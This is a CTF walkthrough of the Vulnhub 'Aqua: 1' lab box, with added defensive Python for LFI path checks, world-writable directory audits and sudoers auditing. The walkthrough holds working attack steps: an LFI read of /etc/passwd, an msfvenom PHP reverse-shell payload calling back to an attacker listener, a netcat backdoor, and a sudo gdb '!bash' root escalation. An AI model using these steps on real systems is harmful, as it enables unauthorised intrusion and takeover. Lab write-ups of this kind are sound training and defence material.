Aqua: 1 walkthrough Vulnhub CTF
First, scan the local network to find the target IP.
Nmap aggressive port scan:
nmap -A 192.168.1.14
Next, directory brute-forcing with dirb. It found many URLs; filtering on the .php extension keeps only the .php files in the output (the wordlist is dirb's second positional argument, so it goes before the options):
dirb http://192.168.1.14 /usr/share/wordlists/dirb/big.txt -X .php
Opening the target IP in a browser shows this page.
Clicking the "Sure, I'll help" button redirects to another page that shows credentials.
The dirb scan also found login.php. Opening it shows a login page; logging in with the credential vashivmegmin succeeds.
This URL is vulnerable to LFI (local file inclusion): we can read the target system's passwd file.
Logging in to FTP gives a "Connection timed out" message. Deeper enumeration showed that port knocking is implemented on this server.
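As an added example (not part of the original walkthrough), here is the defensive side of the LFI shown above: the include path a naive `include($base . $_GET['page'])` builds from user input, next to a resolver that normalises the path, checks that it stays under the web root, and only serves pages from an allowlist. The document root /var/www/html and the page names are constructed assumptions, not values from the box.

```python
import posixpath
from pathlib import PurePosixPath
from typing import Optional

# Constructed assumptions: the document root and the pages the application is meant to include.
WEB_ROOT = PurePosixPath("/var/www/html")
ALLOWED_PAGES = {"index.php", "about.php", "login.php"}


def naive_include_path(page: str, base: PurePosixPath = WEB_ROOT) -> str:
    """What an unvalidated include(base . $_GET['page']) ends up opening."""
    return posixpath.normpath(f"{base}/{page}")


def safe_include_path(page: str, base: PurePosixPath = WEB_ROOT) -> Optional[str]:
    """Return the file to include, or None if the request is not an allowed page under base."""
    if not page or "\x00" in page:          # empty or NUL-truncated names are never valid
        return None
    # normpath collapses "..", "." and doubled slashes textually; no filesystem access needed.
    candidate = PurePosixPath(posixpath.normpath(str(base / page)))
    # base / page discards base when page is absolute, so containment must be checked explicitly.
    if base not in candidate.parents:
        return None
    # Allowlisting the final name also rejects anything that is not a plain page name
    # (subdirectories, stream-wrapper style names, traversal that lands back inside the root).
    if str(candidate.relative_to(base)) not in ALLOWED_PAGES:
        return None
    return str(candidate)


if __name__ == "__main__":
    for probe in ("login.php", "../../../etc/passwd", "/etc/passwd"):
        print(f"{probe!r:28} naive={naive_include_path(probe)!r:32} safe={safe_include_path(probe)!r}")
```

The containment check alone is not enough: a request that traverses out and back in, or names a file under the root that was never meant to be included, still passes it, which is why the final name is compared against an allowlist rather than just checked for a .php suffix.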
knock 192.168.1.14 1234 5678 9012
Log in with FTP again:
- username: megumin
The dir command lists every file in the current directory along with its permissions.
Creating an msfvenom PHP reverse shell payload:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.8 lport=4545 -f raw >/tmp/shell.php
After creating the payload, log in with FTP again using the same username and password. We already saw the directory permissions: 757 means the owner (root) has full permissions, other users have the same full permissions, and only the group is limited to read and execute.
This time, upload our shell to the web directory.
The shell uploaded successfully; now execute it through the LFI (local file inclusion) vulnerability.
I had already started msfconsole with a handler; executing the shell gives a reverse shell on the target machine:
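The 757 mode on that directory is what lets an upload land in the web root. As an added example (not from the original walkthrough), this Python audit breaks a mode into its write bits and walks a document root reporting anything world-writable, skipping sticky directories such as /tmp, which are world-writable by design. The temporary directory layout it builds is constructed sample data, with 0o757 standing in for the page's FTP directory; it assumes a POSIX filesystem that honours chmod.

```python
import os
import shutil
import stat
import tempfile
from typing import Dict, List


def describe_mode(mode: int) -> Dict[str, bool]:
    """Break a permission mode such as 0o757 into the bits that matter for an upload root."""
    return {
        "owner_write": bool(mode & stat.S_IWUSR),
        "group_write": bool(mode & stat.S_IWGRP),
        "world_write": bool(mode & stat.S_IWOTH),
        "sticky": bool(mode & stat.S_ISVTX),
    }


def find_world_writable(root: str) -> List[str]:
    """Return paths under root (relative to it) that any local user may write to.

    Sticky directories are skipped: the sticky bit is the normal way to make a shared
    scratch directory safe, so /tmp-style directories are expected to show world write.
    """
    hits: List[str] = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)                      # judge the entry itself, not a link target
            if stat.S_ISLNK(st.st_mode):
                continue
            world_writable = bool(st.st_mode & stat.S_IWOTH)
            sticky_dir = stat.S_ISDIR(st.st_mode) and bool(st.st_mode & stat.S_ISVTX)
            if world_writable and not sticky_dir:
                hits.append(os.path.relpath(full, root))
    return sorted(hits)


def demo() -> List[str]:
    """Build a constructed web-root layout in a temp dir, audit it, and clean up."""
    root = tempfile.mkdtemp(prefix="webroot-audit-")
    try:
        layout = {                                   # constructed sample tree, not the box's
            "html": 0o755,
            "html/index.php": 0o644,
            "html/uploads": 0o757,                   # the mode the walkthrough reports via FTP
            "html/uploads/note.txt": 0o666,
            "html/tmp": 0o1777,                      # sticky scratch dir: world-writable by design
        }
        for rel, mode in layout.items():             # parents are listed before children
            full = os.path.join(root, rel)
            if "." in os.path.basename(rel):
                open(full, "w").close()
            else:
                os.mkdir(full)
            os.chmod(full, mode)                     # chmod is not subject to the umask
        return find_world_writable(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(describe_mode(0o757))
    print(demo())
```

In production the same walk would run against the real document root with the web server's user in mind: anything the FTP user can write and the web server will execute is the condition the walkthrough exploits.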
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.8
set lport 4545
Running the shell command gives a blank, non-interactive shell, so spawn a bash shell through Python's pty module:
python3 -c 'import pty;pty.spawn("/bin/bash")'
The current user is www-data and has very limited permissions.
The id command shows the current user is www-data. We already have megumin's password, so run su (switch user) to megumin and enter the password; the shell changes from www-data to megumin.
Let's check the sudoers entries with sudo -l.
The sudoers entries list a backdoor script. Opening it with cat shows a bash script that automatically opens a netcat connection. Running it with sudo opens the backdoor.
Connecting to the backdoor:
nc 192.168.1.14 1337
Again, spawn a shell through Python's pty module:
python -c 'import pty;pty.spawn("/bin/bash")'
Running id shows the user has changed to aqua. Running sudo -l again lists several scripts, but I go for the gdb privilege escalation.
GDB privilege escalation (more about gdb: see here):
sudo gdb -nx -ex '!bash' -ex quit
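Both privilege escalations on this box come from sudo rules: one runs a script from the sudoers file that opens a netcat listener, the other lets gdb run as root, and gdb can hand out a shell with !bash. As an added example, not the author's, here is a small sudoers audit that flags those rule shapes: NOPASSWD, unrestricted ALL, relative command paths, commands living under user-writable prefixes, and the tools this walkthrough shows being abused. The sudoers text is a constructed sample; its users and paths are assumptions, not the box's real file.

```python
import os
import re
from typing import List, Set, Tuple

# Constructed sample in /etc/sudoers syntax (not the real file from the box): the shapes mirror
# the walkthrough, a script granted to one user and gdb granted as root, plus two ordinary rules.
SAMPLE_SUDOERS = """\
Defaults env_reset
root     ALL=(ALL:ALL) ALL
megumin  ALL=(aqua) NOPASSWD: /home/megumin/backdoor.sh   # script that opens the netcat listener
aqua     ALL=(root) NOPASSWD: /usr/bin/gdb, /usr/bin/find
www-data ALL=(ALL) /bin/systemctl restart apache2
"""

# Tools the walkthrough itself shows handing out a shell or a listener when run under sudo.
SHELL_CAPABLE = {"gdb", "nc", "netcat"}
USER_WRITABLE_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")

# user  host=(runas)  TAG:  command[, command...]
RULE = re.compile(
    r"^(?P<user>[%\w.-]+)\s+(?P<host>\S+?)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)


def parse_rules(text: str) -> List[Tuple[str, Set[str], List[str]]]:
    """Return (user, tags, command specs) per user-specification line; Defaults and comments are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE.match(line)
        if m is None:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        rules.append((m.group("user"), tags, cmds))
    return rules


def audit_sudoers(text: str) -> List[Tuple[str, str, str]]:
    """Return (user, command, finding-code) triples for rule shapes worth a second look."""
    findings = []
    for user, tags, cmds in parse_rules(text):
        for spec in cmds:
            path = spec.split()[0]                   # arguments, if any, follow the binary
            if "NOPASSWD" in tags:
                findings.append((user, spec, "NOPASSWD"))
            if path == "ALL":
                findings.append((user, spec, "ALL"))
                continue
            if not path.startswith("/"):
                findings.append((user, spec, "RELATIVE_PATH"))
            if path.startswith(USER_WRITABLE_PREFIXES):
                findings.append((user, spec, "USER_WRITABLE_LOCATION"))
            if os.path.basename(path) in SHELL_CAPABLE:
                findings.append((user, spec, "SHELL_CAPABLE"))
    return findings


if __name__ == "__main__":
    for user, cmd, code in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{code:<22} {user:<9} {cmd}")
```

The USER_WRITABLE_LOCATION finding is the one that matters most for the backdoor step: a sudo rule pointing at a script the invoking user can edit is equivalent to granting that user the target account outright, whatever the script currently does.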
cd /root
ls
Reading our last root flag.